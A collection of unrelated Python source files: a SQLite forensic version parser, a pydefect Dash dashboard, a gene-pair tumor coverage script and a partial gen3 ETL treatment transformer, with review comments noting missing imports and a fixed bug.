    analysis_config = ModelAnalyzerAnalysisConfig()
    analysis_config.objectives = {"perf_throughput": 10, "perf_latency": 5}
    summary = Summary(results_path=FILES_DIR / "results.csv",
                      metrics_path=FILES_DIR / "metrics.csv",
                      analysis_config=analysis_config)
    summary.show()
|
<gh_stars>10-100
from abc import ABCMeta
from logging import getLogger
from re import sub
from warnings import warn
from sqlite_dissect.constants import BASE_VERSION_NUMBER
from sqlite_dissect.constants import LOGGER_NAME
from sqlite_dissect.constants import MASTER_SCHEMA_ROW_TYPE
from sqlite_dissect.constants import PAGE_TYPE
from sqlite_dissect.exception import VersionParsingError
from sqlite_dissect.file.schema.master import OrdinaryTableRow
from sqlite_dissect.file.schema.master import VirtualTableRow
"""
version_parser.py
This script holds the objects for parsing through the version history for master schema entries. This can be used
for retrieving cells (records), carving, signature generation, etc..
This script holds the following object(s):
VersionParser(object)
"""
class VersionParser(object):
    """Abstract base for parsers that follow a single master schema entry
    across a version history (see the module docstring above). Subclasses
    use the computed parser starting/ending version numbers and the
    per-version root page number index to retrieve cells, carve, generate
    signatures, etc.

    NOTE(review): ``__metaclass__`` is the Python 2 ABC mechanism; under
    Python 3 it has no effect (``metaclass=ABCMeta`` would be required).
    """

    __metaclass__ = ABCMeta

    def __init__(self, version_history, master_schema_entry, version_number=None, ending_version_number=None):
        """
        The version history will be iterated through and the respective subclass will use the master schema entry
        parsed from every version where that master schema entry is found.  The version numbers where the master schema
        entry is found until the last version it is found in (if applicable) will be set at the parser starting version
        number and parser ending version number.

        In addition, the version number may be set for a specific version to be parsed.  This way if you only want a
        specific version to be parsed, you can specify the version number.  If you want the range between two specific
        versions, the version number and ending version number can be specified to parse the versions in between
        (including the specified version number and ending version number).  If these fields are set the parser
        starting and ending version number will be set accordingly to be within the range of these versions, if
        existing, otherwise None.  If the master schema entry does not exist in between the versions, a warning will
        be raised and the subclass will handle the use case accordingly (either by creating an empty object(s) or an
        "empty" class depending on implementation).

        The md5_hash_identifier field is used from the master schema entry to identify it across the versions.  Due
        to this, it does not matter what master schema entry from what version you choose.  The md5_hash_identifier
        is derived from the row id, name, table name, type, and sql to ensure uniqueness.  (Root page numbers can be
        updated.)

        Note:  The use case where the same master schema entry is removed and re-added needs to be addressed in the wal
               file and is not fully supported here.

        :param version_history: the VersionHistory object whose versions will be walked.
        :param master_schema_entry: the master schema entry (any version's copy) to track.
        :param version_number: optional first version to parse (defaults to the base version).
        :param ending_version_number: optional last version to parse (defaults to the last version).

        :return:

        :raise: ValueError on inconsistent version number arguments;
                VersionParsingError on internal inconsistencies while walking versions.
        """

        logger = getLogger(LOGGER_NAME)

        # An ending version number without a starting one is ambiguous.
        if version_number is None and ending_version_number:
            log_message = "Version number not specified where ending version number was specified as: {} for " \
                          "master schema entry with root page number: {} row type: {} name: {} table name: {} " \
                          "and sql: {}."
            log_message = log_message.format(ending_version_number, master_schema_entry.root_page_number,
                                             master_schema_entry.row_type, master_schema_entry.name,
                                             master_schema_entry.table_name, master_schema_entry.sql)
            logger.error(log_message)
            raise ValueError(log_message)

        # A single version is requested by leaving ending_version_number unset,
        # never by specifying an identical pair.
        if version_number is not None and version_number == ending_version_number:
            log_message = "Version number: {} specified where ending version number was also specified as: {} for " \
                          "master schema entry with root page number: {} row type: {} name: {} table name: {} and " \
                          "sql: {}."
            log_message = log_message.format(version_number, ending_version_number,
                                             master_schema_entry.root_page_number, master_schema_entry.row_type,
                                             master_schema_entry.name, master_schema_entry.table_name,
                                             master_schema_entry.sql)
            logger.error(log_message)
            raise ValueError(log_message)

        number_of_versions = version_history.number_of_versions

        """

        The ending version number needs to be less than the number of versions since version numbers start from
        0 and go to the last version.  Therefore, the number of versions will be one greater than the last version
        number.

        """

        if ending_version_number is not None and (ending_version_number >= number_of_versions or
                                                  ending_version_number <= version_number):
            log_message = "Invalid ending version number: {} with {} number of versions with version number: {} for " \
                          "master schema entry with root page number: {} row type: {} name: {} table name: {} " \
                          "and sql: {}."
            log_message = log_message.format(ending_version_number, number_of_versions, version_number,
                                             master_schema_entry.root_page_number, master_schema_entry.row_type,
                                             master_schema_entry.name, master_schema_entry.table_name,
                                             master_schema_entry.sql)
            logger.error(log_message)
            raise ValueError(log_message)

        # Requested range (as given); the parser_* fields below hold the
        # effective range, later narrowed to where the entry actually exists.
        self.version_number = version_number
        self.ending_version_number = ending_version_number
        self.parser_starting_version_number = version_number if version_number is not None else BASE_VERSION_NUMBER
        self.parser_ending_version_number = ending_version_number \
            if ending_version_number is not None else number_of_versions - 1

        """

        According to the sqlite documentation the only pages with a root page are table and index types (excluding
        virtual tables.)  Therefore we can only parse cells from these types.  In the case that trigger or
        view master schema entry row types were specified we raise a warning here.  This will result in having
        no entries to parse through.

        Note:  Support for virtual table modules that may or may not have database b-tree pages need to be accounted
               for.  A warning will be displayed if a virtual table is encountered.

        Note:  Support for "without rowid" tables are not accounted for properly.  For now, a warning will be displayed.

        """

        if master_schema_entry.row_type not in [MASTER_SCHEMA_ROW_TYPE.TABLE, MASTER_SCHEMA_ROW_TYPE.INDEX]:
            log_message = "Invalid master schema entry row type: {} for master schema entry with root page " \
                          "number: {} name: {} table name: {} and sql: {}.  Only table and index master " \
                          "schema entries have associated cells to be parsed."
            log_message = log_message.format(master_schema_entry.row_type, master_schema_entry.root_page_number,
                                             master_schema_entry.name, master_schema_entry.table_name,
                                             master_schema_entry.sql)
            logger.warn(log_message)
            warn(log_message, RuntimeWarning)

        # Set the page type and update it as appropriate
        self.page_type = PAGE_TYPE.B_TREE_TABLE_LEAF

        if isinstance(master_schema_entry, VirtualTableRow):
            log_message = "A virtual table row type was found for the version parser which is not fully supported " \
                          "for master schema entry root page number: {} type: {} name: {} table name: {} and sql: {}."
            log_message = log_message.format(master_schema_entry.root_page_number,
                                             master_schema_entry.row_type, master_schema_entry.name,
                                             master_schema_entry.table_name, master_schema_entry.sql)
            logger.warn(log_message)
            warn(log_message, RuntimeWarning)

        elif isinstance(master_schema_entry, OrdinaryTableRow) and master_schema_entry.without_row_id:
            log_message = "A \"without rowid\" table row type was found for the version parser which is not " \
                          "supported for master schema entry root page number: {} row type: {} name: {} " \
                          "table name: {} and sql: {}.  Erroneous cells may be generated."
            log_message = log_message.format(master_schema_entry.root_page_number,
                                             master_schema_entry.row_type, master_schema_entry.name,
                                             master_schema_entry.table_name, master_schema_entry.sql)
            logger.warn(log_message)
            warn(log_message, RuntimeWarning)
            # "without rowid" tables are stored as index b-trees.
            self.page_type = PAGE_TYPE.B_TREE_INDEX_LEAF

        # Set the page type if the master schema row type is a index
        if master_schema_entry.row_type == MASTER_SCHEMA_ROW_TYPE.INDEX:
            self.page_type = PAGE_TYPE.B_TREE_INDEX_LEAF

        """

        Set the master schema entry fields we care about in this class.  Since root page numbers can be different
        depending on versions, root page numbers is a dictionary in the form of:

        root_page_number_version_index[VERSION_NUMBER] = ROOT_PAGE_NUMBER(VERSION)

        """

        self.row_type = master_schema_entry.row_type
        self.name = master_schema_entry.name
        self.table_name = master_schema_entry.table_name
        self.sql = master_schema_entry.sql
        self.root_page_number_version_index = {}

        # Get the md5_hash_identifier from the master schema entry
        self.master_schema_entry_md5_hash_identifier = master_schema_entry.md5_hash_identifier

        """

        Setup the version numbers to parse through for the version history.

        Note:  If the master schema entry is either not found, or stops being found and then re-found, a warning will
               be raised.  The master schema entry uniqueness is determined by the master schema entry md5 hash
               identifier from the MasterSchemaRow class.

        """

        versions = version_history.versions

        # Narrowed to the contiguous run of versions actually containing the entry.
        starting_version_number = None
        ending_version_number = None

        for version_number in range(self.parser_starting_version_number, self.parser_ending_version_number + 1):

            version = versions[version_number]

            # Use the version's own master schema only when it changed;
            # otherwise fall back to the last known master schema.
            if version.master_schema_modified:
                master_schema = version.master_schema
            else:
                master_schema = version.last_master_schema

            if not master_schema:
                log_message = "Master schema was unable to be found in starting version number: {} while parsing " \
                              "the version history for master schema entry with name: {} table name: {} " \
                              "row type: {} and sql: {} for version number: {} and ending version number: {}."
                log_message = log_message.format(version_number, self.name, self.table_name, self.row_type, self.sql,
                                                 self.parser_starting_version_number,
                                                 self.parser_ending_version_number)
                logger.error(log_message)
                raise VersionParsingError(log_message)

            entries = master_schema.master_schema_entries
            entries_dictionary = dict(map(lambda entry: [entry.md5_hash_identifier, entry], entries))

            if self.master_schema_entry_md5_hash_identifier in entries_dictionary:

                if ending_version_number is None:

                    # First sighting of the entry: both bounds must still be unset.
                    if starting_version_number is not None:
                        log_message = "The starting version number was set already when it should not have been " \
                                      "since the ending version number was still not set for master schema entry " \
                                      "row type: {} with root page number: {} name: {} table name: {} and sql: {}."
                        log_message = log_message.format(master_schema_entry.row_type,
                                                         master_schema_entry.root_page_number, master_schema_entry.name,
                                                         master_schema_entry.table_name, master_schema_entry.sql)
                        logger.error(log_message)
                        raise VersionParsingError(log_message)

                    starting_version_number = version_number
                    ending_version_number = version_number

                    if self.root_page_number_version_index:
                        log_message = "The root page number version index has already been populated with values " \
                                      "when it should not have been for master schema entry row type: {} with root " \
                                      "page number: {} name: {} table name: {} and sql: {}."
                        log_message = log_message.format(master_schema_entry.row_type,
                                                         master_schema_entry.root_page_number, master_schema_entry.name,
                                                         master_schema_entry.table_name, master_schema_entry.sql)
                        logger.error(log_message)
                        raise VersionParsingError(log_message)

                    # Add the first version number and b-tree root page number into the root page number version index
                    root_page_number = entries_dictionary[self.master_schema_entry_md5_hash_identifier].root_page_number
                    self.root_page_number_version_index[version_number] = root_page_number

                elif ending_version_number == version_number - 1:

                    # Contiguous continuation of the entry's run of versions.
                    ending_version_number = version_number

                    if not self.root_page_number_version_index:
                        log_message = "The root page number version index has not already been populated with values " \
                                      "when it should have been for master schema entry row type: {} with root " \
                                      "page number: {} name: {} table name: {} and sql: {}."
                        log_message = log_message.format(master_schema_entry.row_type,
                                                         master_schema_entry.root_page_number, master_schema_entry.name,
                                                         master_schema_entry.table_name, master_schema_entry.sql)
                        logger.error(log_message)
                        raise VersionParsingError(log_message)

                    # Add the version number and b-tree root page number into the root page number version index
                    root_page_number = entries_dictionary[self.master_schema_entry_md5_hash_identifier].root_page_number
                    self.root_page_number_version_index[version_number] = root_page_number

                else:

                    # The entry disappeared and re-appeared (removed/re-added);
                    # this use case is not fully supported (see docstring note).
                    log_message = "Version number: {} did not have a master schema entry for the previous " \
                                  "version number for master schema entry with name: {} table name: {} " \
                                  "row type: {} and sql: {} for version number: {} and ending version number: {}."
                    log_message = log_message.format(version_number, self.name, self.table_name, self.row_type,
                                                     self.sql, self.parser_starting_version_number,
                                                     self.parser_ending_version_number)
                    logger.warn(log_message)
                    warn(log_message, RuntimeWarning)

        if starting_version_number is None and ending_version_number is None:
            log_message = "Was unable to find any matching schema entries between version numbers {} " \
                          "and {}.  The version parser will not parse anything for master schema entry with " \
                          "name: {} table name: {} row type: {} and sql: {}."
            log_message = log_message.format(self.parser_starting_version_number,
                                             self.parser_ending_version_number, self.name, self.table_name,
                                             self.row_type, self.sql)
            logger.warn(log_message)
            warn(log_message, RuntimeWarning)

        # Effective parsing range; both are None when the entry was never found.
        self.parser_starting_version_number = starting_version_number
        self.parser_ending_version_number = ending_version_number

        """

        We now have the parser starting and ending version numbers that we need to parse between and a root
        page number version index referring to each version and it's root b-tree page in case it was updated.

        Note:  The root pages to the master schema entries are generated on demand from the version which will return
               the b-tree page if it is already in memory, or parse it and then return it if it is not.  Versions can
               either be stored in memory or read out on demand for b-tree pages.  This is allowed for conserving
               memory and speeding up parsing (so each b-tree page does not need to be parsed in the case where
               they do not change).

        """

    def __repr__(self):
        # NOTE(review): str.encode("hex") is Python 2 only; under Python 3
        # this raises LookupError — this module targets Python 2.
        return self.__str__().encode("hex")

    def __str__(self):
        # Collapse the multi-line stringify() output onto a single line.
        return sub("\t", "", sub("\n", " ", self.stringify()))

    def stringify(self, padding=""):
        """Return a multi-line, human-readable dump of the parser state,
        each line prefixed with *padding*.
        """
        string = padding + "Row Type: {}\n" \
                 + padding + "Page Type: {}\n" \
                 + padding + "Name: {}\n" \
                 + padding + "Table Name: {}\n" \
                 + padding + "SQL: {}\n" \
                 + padding + "Root Page Number Version Index: {}\n" \
                 + padding + "Master Schema Entry MD5 Hash Identifier: {}\n" \
                 + padding + "Version Number: {}\n" \
                 + padding + "Ending Version Number: {}\n" \
                 + padding + "Parser Starting Version Number: {}\n" \
                 + padding + "Parser Ending Version Number: {}"
        string = string.format(self.row_type,
                               self.page_type,
                               self.name,
                               self.table_name,
                               self.sql,
                               self.root_page_number_version_index,
                               self.master_schema_entry_md5_hash_identifier,
                               self.version_number,
                               self.ending_version_number,
                               self.parser_starting_version_number,
                               self.parser_ending_version_number)
        return string
|
<filename>pydefect/analyzer/dash_components/main.py
# coding: utf-8
# Copyright (c) 2020 Kumagai group.
import argparse
import sys
from pathlib import Path
import crystal_toolkit.components as ctc
from crystal_toolkit.helpers.layouts import *
from dash import Dash
from pydefect.analyzer.calc_results import CalcResults
from pydefect.analyzer.dash_components.cpd_energy_dash import \
CpdEnergy2D3DComponent, CpdEnergyOtherComponent
from pydefect.analyzer.dash_components.scenes_from_volumetric_data import \
SceneDicts
from pydefect.analyzer.dash_components.single_defect_component import \
SingleDefectComponent
from pydefect.analyzer.dash_components.supercell_component import \
SupercellComponent
from pydefect.analyzer.eigenvalue_plotter import EigenvaluePlotlyPlotter
from pydefect.chem_pot_diag.chem_pot_diag import CpdPlotInfo, ChemPotDiag
from pydefect.corrections.site_potential_plotter import \
SitePotentialPlotlyPlotter
from pydefect.defaults import defaults
from pydefect.input_maker.defect_entry import DefectEntry
from pymatgen import Structure
from vise.analyzer.dash_components.band_dos_dash import BandDosComponent
from vise.analyzer.dash_components.main import symmetry_layout, site_layout, \
mpid_and_link
from vise.analyzer.dash_components.structure_component import StructureComponent
from vise.util.structure_symmetrizer import StructureSymmetrizer
# Global Dash application served by the __main__ block below.
# suppress_callback_exceptions=True allows callbacks that reference
# components not present in the initial layout.
# NOTE(review): ``SETTINGS`` is not imported anywhere in this module —
# presumably it should come from ``crystal_toolkit.settings`` (or via the
# star import above); confirm, otherwise this line raises NameError at
# import time.
app = Dash(suppress_callback_exceptions=True,
           assets_folder=SETTINGS.ASSETS_PATH)
def create_ctk(struct_component,
               crystal_symmetry,
               mpid_and_link,
               sites,
               band_dos_component,
               supercell_component_layout,
               cpd_energy_layout,
               single_defect_layouts):
    """Assemble the crystal-toolkit page layout for the defect dashboard.

    Args:
        struct_component: StructureComponent for the unit cell viewer.
        crystal_symmetry: pre-built symmetry summary layout.
        mpid_and_link: pre-built Materials Project id/link layout.
        sites: pre-built site-information layout.
        band_dos_component: component with a ``layout()`` method for the
            band structure / DOS section.
        supercell_component_layout: layout of the supercell viewer.
        cpd_energy_layout: chemical-potential-diagram energy layout(s);
            concatenated with the supercell column below.
        single_defect_layouts: list of per-defect layouts.

    Returns:
        The top-level Container layout to register with crystal toolkit.
    """
    # Shared CSS size for the square viewer boxes (30% of the smaller
    # viewport dimension, clamped by min/max pixel sizes below).
    box_size = "30vmin"
    # Supercell viewer wrapped in a fixed-size box so it lines up with the
    # chemical-potential-diagram section.
    supercell = Column(
        [
            Box(
                supercell_component_layout,
                style={
                    "width": box_size,
                    "height": box_size,
                    "minWidth": "300px",
                    "minHeight": "300px",
                    "maxWidth": "600px",
                    "maxHeight": "600px",
                    "overflow": "hidden",
                    "padding": "0.25rem",
                    "marginBottom": "0.5rem",
                },
            ),
        ],
        narrow=True,
    )
    # Page structure: (1) structure viewer + symmetry info + sites,
    # (2) band/DOS section, (3) CPD energies + supercell + per-defect panels.
    _layout = Container(
        [
            Section(
                [
                    Columns(
                        [
                            Column(
                                [struct_component.title_layout()]
                            )
                        ]
                    ),
                    Columns(
                        [
                            Column(
                                [
                                    Box(
                                        struct_component.layout(size="100%"),
                                        style={
                                            "width": box_size,
                                            "height": box_size,
                                            "minWidth": "300px",
                                            "minHeight": "300px",
                                            "maxWidth": "800px",
                                            "maxHeight": "800px",
                                            "overflow": "hidden",
                                            "padding": "0.25rem",
                                            "marginBottom": "0.5rem",
                                        },
                                    ),
                                    html.Div(
                                        [
                                            html.Div(
                                                struct_component.legend_layout(),
                                                style={"float": "left"},
                                            ),
                                        ],
                                        style={
                                            "width": box_size,
                                            "minWidth": "300px",
                                            "marginBottom": "40px",
                                        },
                                    ),
                                ],
                                narrow=True,
                            ),
                            Column(
                                [crystal_symmetry, mpid_and_link],
                                style={"width": box_size, "max-width": box_size},
                            ),
                        ],
                        desktop_only=False,
                        centered=False,
                    ),
                    Columns(Column([sites])),
                ]
            ),
            Section([band_dos_component.layout()]
            ),
            Section([Columns(cpd_energy_layout + [supercell]),
                     Column(single_defect_layouts)])
        ]
    )
    return _layout
def make_layouts(structure: Structure, dos_plot_data, band_plot_data,
                 perfect_dirname, defect_dirnames, supercell_info, chem_pot_diag):
    """Load calculation artefacts and build the full dashboard layout.

    Args:
        structure: unit-cell structure shown in the structure viewer.
        dos_plot_data: DOS plot data for the band/DOS component.
        band_plot_data: band plot data for the band/DOS component.
        perfect_dirname: directory holding the perfect-supercell results.
        defect_dirnames: one directory per defect calculation.
        supercell_info: deserialized supercell information object.
        chem_pot_diag: path to the chemical-potential-diagram yaml file.

    Returns:
        The crystal-toolkit layout produced by create_ctk().

    NOTE(review): ``loadfn`` is not imported in this module (it normally
    comes from ``monty.serialization``); confirm it is in scope at runtime.
    """
    cpd_plot_info = CpdPlotInfo(ChemPotDiag.from_yaml(chem_pot_diag))
    perfect: CalcResults = loadfn(perfect_dirname / "calc_results.json")
    defects, defect_entries, corrections, single_defect_layouts = [], [], [], []
    for d in defect_dirnames:
        # TODO: check convergence
        defects.append(loadfn(d / "calc_results.json"))
        # Load each json exactly once and reuse it (the original read both
        # defect_entry.json and correction.json twice per directory).
        defect_entry: DefectEntry = loadfn(d / "defect_entry.json")
        defect_entries.append(defect_entry)
        efnv_correction = loadfn(d / "correction.json")
        corrections.append(efnv_correction)
        eigval = loadfn(d / "band_edge_eigenvalues.json")
        pot = SitePotentialPlotlyPlotter(title=defect_entry.full_name,
                                         efnv_correction=efnv_correction)
        eig = EigenvaluePlotlyPlotter(title=defect_entry.full_name,
                                      band_edge_eigenvalues=eigval,
                                      supercell_vbm=perfect.vbm,
                                      supercell_cbm=perfect.cbm)
        scene_dicts = loadfn(d / "parchgs" / "scene_dicts.json")
        if isinstance(scene_dicts, dict):
            scene_dicts = SceneDicts.from_dict(scene_dicts)
        single_defect_layouts.append(
            SingleDefectComponent(pot, eig, scene_dicts, defect_entry.full_name,
                                  id=f"{defect_entry.full_name}").layout())
    # Interactive CPD component only exists for 2D/3D diagrams.
    if cpd_plot_info.cpd.dim in [2, 3]:
        cpd_energy_comp = CpdEnergy2D3DComponent(cpd_plot_info, perfect, defects,
                                                 defect_entries, corrections)
    else:
        cpd_energy_comp = CpdEnergyOtherComponent(cpd_plot_info, perfect, defects,
                                                  defect_entries, corrections)
    structure_component = StructureComponent(structure)
    comp = structure.composition.reduced_formula
    band_dos_component = BandDosComponent(dos_plot_data, band_plot_data, id=f"band_dos_{comp}",)
    supercell_component = SupercellComponent(supercell_info)
    symmetrizer = StructureSymmetrizer(structure)
    return create_ctk(structure_component,
                      symmetry_layout(structure),
                      mpid_and_link(symmetrizer),
                      site_layout(symmetrizer),
                      band_dos_component,
                      supercell_component.layout,
                      cpd_energy_comp.layout,
                      single_defect_layouts)
def parse_args(args):
    """Parse the command-line options for the defect dashboard app."""
    parser = argparse.ArgumentParser(description="")
    # The three plain directory options share type/required settings.
    for short_flag, long_flag in (("-b", "--band"),
                                  ("-d", "--dos"),
                                  ("-p", "--perfect")):
        parser.add_argument(short_flag, long_flag, type=Path, required=True)
    parser.add_argument("-def", "--defects", type=Path, nargs="+", required=True)
    parser.add_argument("-s", "--supercell_info", type=loadfn, required=True)
    parser.add_argument("-c", "--chem_pot_diag", type=str, required=True)
    parser.add_argument("--port", type=int)
    return parser.parse_args(args)
# Script entry point: load the calculation artefacts named on the command
# line, assemble the dashboard layout and serve it with Dash.
if __name__ == "__main__":
    args = parse_args(sys.argv[1:])
    # Structure comes from the (possibly renamed) CONTCAR in the DOS dir.
    structure = Structure.from_file(args.dos / defaults.contcar)
    # NOTE(review): ``loadfn`` is not imported in this module — confirm it
    # is provided (normally ``from monty.serialization import loadfn``).
    dos_plot_data = loadfn(args.dos / "dos_plot_data.json")
    band_plot_data = loadfn(args.band / "band_plot_info.json")
    layout = make_layouts(structure, dos_plot_data, band_plot_data,
                          args.perfect, args.defects, args.supercell_info,
                          args.chem_pot_diag)
    ctc.register_crystal_toolkit(app=app, layout=layout, cache=None)
    app.run_server(debug=True, port=args.port)
|
########################################################
#### Packages ####
import datetime
import time
import sys
from itertools import combinations
start = time.time()
########################################################
#### Prepare RF-result and 2 inputs ####
# Inputs: (1) per-cell annotation table, (2) gene x cell count matrix.
# Renamed from ``input`` so the builtin of that name is not shadowed.
argv = sys.argv
input1 = argv[1]
input2 = argv[2]
print(input1,input2)
# Top-100 genes (rows 2-101) of the random-forest variable-importance
# result: first column, surrounding quotes stripped. The file handle was
# previously leaked; all files are now closed via context managers.
with open("../results/result-1__rf_var-imp.txt") as f_imp:
    surf_goi = [line.strip().split(' ')[0][1:-1] for line in f_imp][1:101]
#f = open("input-2a__scrna_annotation.txt","r")
# Split cell barcodes into tumor / normal sets (annotation header skipped).
d_all_tum = dict()
d_all_nor = dict()
with open(input1, "r") as f:
    f.readline()
    for line in f:
        comp = line.strip().split('\t')
        cell = comp[0].strip()
        anno = comp[1].strip()
        if 'Tumor' in anno:
            d_all_tum[cell] = ''
        if 'Normal' in anno:
            d_all_nor[cell] = ''
#f = open("input-2b__scrna_gc-matrix.txt","r")
surf_goi_set = set(surf_goi)  # O(1) membership test in the row loop below
with open(input2, "r") as f:
    # Header row: classify each matrix column as a tumor or normal cell.
    line_1st = f.readline().strip().split('\t')
    c_tum = list()
    c_nor = list()
    for i, cell_id in enumerate(line_1st):
        if i == 0:
            continue
        if cell_id in d_all_tum:
            c_tum.append(i)
        if cell_id in d_all_nor:
            c_nor.append(i)
    total_tum = float(len(c_tum))
    total_nor = float(len(c_nor))
    # d_all: gene -> [tumor expression values, normal expression values].
    # (The original also tallied per-gene nonzero counts here, but they
    # were never used, so they are dropped.)
    d_all = dict()
    for line in f:
        comp = line.strip().split('\t')
        gene = comp[0].strip()
        if gene in surf_goi_set:
            d_all[gene] = [[float(comp[i]) for i in c_tum],
                           [float(comp[i]) for i in c_nor]]
print("Job1 : Done\n")
########################################################
#### Calculation of Coverages for AND- and OR-gates ####
# For every unordered gene pair: fraction of tumor / normal cells that
# express BOTH genes (AND gate) or AT LEAST ONE gene (OR gate).
surf_goi.sort()
c2 = list(combinations(surf_goi,2))
print("all combi count : ",len(c2),"\n")
line_ext_1st = 'Gene_combination\tCoverage_tumor\tCoverage_normal'
line_ext_and = list()
line_ext_or = list()
all_count = 0
for pair in c2:
    all_count += 1
    if all_count % 2000 == 0:
        print(all_count)
    gene1 = pair[0].strip()
    gene2 = pair[1].strip()
    p_name = gene1+'_'+gene2
    ##
    if gene1 not in d_all or gene2 not in d_all:
        continue
    temp_tum1, temp_nor1 = d_all[gene1]
    temp_tum2, temp_nor2 = d_all[gene2]
    ##
    cnt_tum_and = 0.0
    cnt_nor_and = 0.0
    cnt_tum_or = 0.0
    cnt_nor_or = 0.0
    for i in range(int(total_tum)):
        if temp_tum1[i] != 0.0 and temp_tum2[i] != 0.0:
            cnt_tum_and += 1.0
        # BUG FIX: the AND branch above previously ALSO incremented
        # cnt_tum_or, double-counting cells that express both genes (the
        # tumor OR coverage could exceed 1.0). The OR test below already
        # includes those cells, matching the normal-cell loop.
        if temp_tum1[i] != 0.0 or temp_tum2[i] != 0.0:
            cnt_tum_or += 1.0
    for i in range(int(total_nor)):
        if temp_nor1[i] != 0.0 and temp_nor2[i] != 0.0:
            cnt_nor_and += 1.0
        if temp_nor1[i] != 0.0 or temp_nor2[i] != 0.0:
            cnt_nor_or += 1.0
    prop_tum_and = str(cnt_tum_and/total_tum)
    prop_tum_or = str(cnt_tum_or/total_tum)
    prop_nor_and = str(cnt_nor_and/total_nor)
    prop_nor_or = str(cnt_nor_or/total_nor)
    ##
    line_ext_and.append([p_name+'\t'+prop_tum_and+'\t'+prop_nor_and, p_name, float(prop_nor_and), float(prop_tum_and)])
    line_ext_or.append([p_name+'\t'+prop_tum_or+'\t'+prop_nor_or, p_name, float(prop_nor_or), float(prop_tum_or)])
print("Job2 : Done\n")
# Write each gate's table sorted by tumor coverage, descending.
line_final = [row[0] for row in sorted(line_ext_and, key=lambda row: row[-1], reverse=True)]
line_final.insert(0, line_ext_1st)
with open("../results/result-2__coverage_gate-and.txt","w") as f_out:
    f_out.write('\n'.join(line_final))
line_final = [row[0] for row in sorted(line_ext_or, key=lambda row: row[-1], reverse=True)]
line_final.insert(0, line_ext_1st)
with open("../results/result-2__coverage_gate-or.txt","w") as f_out:
    f_out.write('\n'.join(line_final))
########################################################
#### Calculation of Coverages for NOT-gates ####
# For every ORDERED gene pair (gene1, gene2): fraction of cells that
# express gene1 but NOT gene2.
from itertools import permutations
c2 = list(permutations(surf_goi,2))
print("all combi count : ",len(c2),"\n")
line_ext_1st = 'Gene_combination\tCoverage_tumor\tCoverage_normal'
line_ext_not = list()
all_count = 0
for pair in c2:
    all_count += 1
    if all_count % 2000 == 0:
        print(all_count)
    gene1 = pair[0].strip()
    gene2 = pair[1].strip()
    p_name = gene1+'_'+gene2
    ##
    if gene1 not in d_all or gene2 not in d_all:
        continue
    temp_tum1, temp_nor1 = d_all[gene1]
    temp_tum2, temp_nor2 = d_all[gene2]
    ##
    cnt_tum_not = 0.0
    cnt_nor_not = 0.0
    for i in range(int(total_tum)):
        if temp_tum1[i] != 0.0 and temp_tum2[i] == 0.0:
            cnt_tum_not += 1.0
    for i in range(int(total_nor)):
        if temp_nor1[i] != 0.0 and temp_nor2[i] == 0.0:
            cnt_nor_not += 1.0
    prop_tum_not = str(cnt_tum_not/total_tum)
    prop_nor_not = str(cnt_nor_not/total_nor)
    ##
    line_ext_not.append([p_name+'\t'+prop_tum_not+'\t'+prop_nor_not, p_name, float(prop_nor_not), float(prop_tum_not)])
print("Job3 : Done\n")
line_final = [row[0] for row in sorted(line_ext_not, key=lambda row: row[-1], reverse=True)]
line_final.insert(0, line_ext_1st)
with open("../results/result-2__coverage_gate-not.txt","w") as f_out:
    f_out.write('\n'.join(line_final))
####
# Report total wall-clock runtime as hh:mm:ss (microseconds dropped).
# The original also built an unused ``result`` timedelta; removed.
end = time.time()
sec = end - start
result_list = str(datetime.timedelta(seconds=sec)).split(".")
print(result_list[0])
|
<filename>transform/bcc_labkey/treatment.py<gh_stars>1-10
"""A transformer for gen3 project,reads treatments bcc, writes to DEFAULT_OUTPUT_DIR."""
import hashlib
import os
import json
from gen3_etl.utils.ioutils import reader
from defaults import DEFAULT_OUTPUT_DIR, DEFAULT_EXPERIMENT_CODE, DEFAULT_PROJECT_ID, default_parser, emitter, default_treatment, missing_parent, save_missing_parents, obscure_dates
from gen3_etl.utils.schema import generate, template
# Labkey export files providing id -> display-name lookup tables; each path
# is parsed once into the module-level LOOKUPS dict at import time.
LOOKUP_PATHS = """
source/bcc/treatment_agent.json
source/bcc/treatment_agent_alt_name.json
source/bcc/treatment_chemotherapy_regimen.json
source/bcc/unit_of_measure.json
source/bcc/treatment_combo.json
source/bcc/treatment_combo_agents.json
source/bcc/treatment_type.json
source/bcc/delivery_method.json
""".strip().split()
def get_uniq(line):
    """Returns a uniq value other than treatment type or submitter id.

    Checks 'lsid', then 'date', then 'definitive_resection_date', returning
    the first key present (its value, even if falsy); None if none exist.
    """
    for candidate_key in ('lsid', 'date', 'definitive_resection_date'):
        if candidate_key in line:
            return line[candidate_key]
    return None
def transform_gen3(item_paths, output_dir, project_id, compresslevel=0):
    """Creates gen3.treatment, returns set of treatment_ids.

    Args:
        item_paths: iterable of (path, treatment_type, callback) triples.
        output_dir: directory that already holds diagnosis.json and that
            receives the emitted treatment records.
        project_id: gen3 project identifier stamped on each record.
        compresslevel: unused here; kept for signature parity with the
            other transform_* functions.
    """
    # Treatments whose diagnosis was never emitted are recorded via
    # missing_parent() and skipped.
    diagnoses = set([line['submitter_id'] for line in reader('{}/diagnosis.json'.format(output_dir))])
    treatment_emitter = emitter('treatment', output_dir=output_dir)
    treatment_ids = set([])
    missing_diagnoses = []
    # (The per-path ``source`` local of the original was never used here.)
    for p, treatment_type, callback in item_paths:
        for line in reader(p):
            participantid = line.get('ParticipantID', line.get('participantid', None))
            assert participantid, 'ParticipantID not in {} {}'.format(p, line.keys())
            diagnosis_submitter_id = '{}-diagnosis'.format(participantid)
            treatment_submitter_id = '{}-{}-{}'.format(diagnosis_submitter_id, treatment_type, get_uniq(line))
            if diagnosis_submitter_id not in diagnoses:
                missing_diagnoses.append(missing_parent(parent_id=diagnosis_submitter_id, parent_type='diagnosis', child_id=treatment_submitter_id, child_type='treatment'))
                print('skipping missing diagnosis', treatment_submitter_id)
                continue
            if treatment_submitter_id in treatment_ids:
                print('skipping ',treatment_submitter_id, p, line.keys())
                continue
            treatment_ids.add(treatment_submitter_id)
            treatment = default_treatment(treatment_submitter_id, diagnosis_submitter_id, treatment_type, project_id)
            treatment = obscure_dates(treatment, output_dir=output_dir, participantid=participantid)
            treatment_emitter.write(treatment)
    # Close the emitter like the other transforms do (previously leaked).
    treatment_emitter.close()
    save_missing_parents(missing_diagnoses)
    return treatment_ids
def transform_chemotherapy(item_paths, output_dir, project_id, treatment_ids, compresslevel=0):
    """Read bcc labkey json and writes gen3 json.

    Emits one bcc_chemotherapy record per input row whose parent treatment
    id (produced by transform_gen3) exists in *treatment_ids*.
    """
